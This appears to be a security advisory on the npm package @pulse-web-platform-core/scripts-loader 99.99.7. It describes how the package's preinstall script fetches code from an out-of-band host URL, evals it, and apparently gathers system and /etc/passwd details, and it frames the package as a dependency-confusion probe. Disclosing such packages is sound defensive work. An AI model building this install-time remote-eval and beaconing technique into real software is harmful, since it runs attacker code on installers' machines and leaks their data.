@pulse-web-platform-core/scripts-loader @99.99.7

Summary

On npm install , the package's preinstall.js performs an HTTP GET to http://${pkg}.${scope}.oob.moika.tech/poc.js and passes the response body directly to eval() with no integrity verification. The URL embeds the installing package's scope and name as DNS subdomains of oob.moika.tech , causing the installer's resolver and the remote server to receive the target's scope/package context as an out-of-band beacon before any code runs. The fetched payload then executes with the installer's privileges; an in-source comment indicates intent to collect whoami , hostname , ifconfig , and /etc/passwd output. The package metadata ( keywords: ["bug bounty"] , version 99.99.7 , generic description k2 cloud utilities , scope @pulse-web-platform-core ) is consistent with a dependency-confusion probe targeting an internal scope, but the install-time behavior is indistinguishable from a malicious supply-chain attack: every installer who pulls this package — whether deliberately or via name-confusion — executes attacker-controlled remote code over unauthenticated HTTP.

Source: amazon-inspector (7c69fc52eb76aa05711ea0c128624eb1fc8c70655a58f2f3e646da1dcd20f254)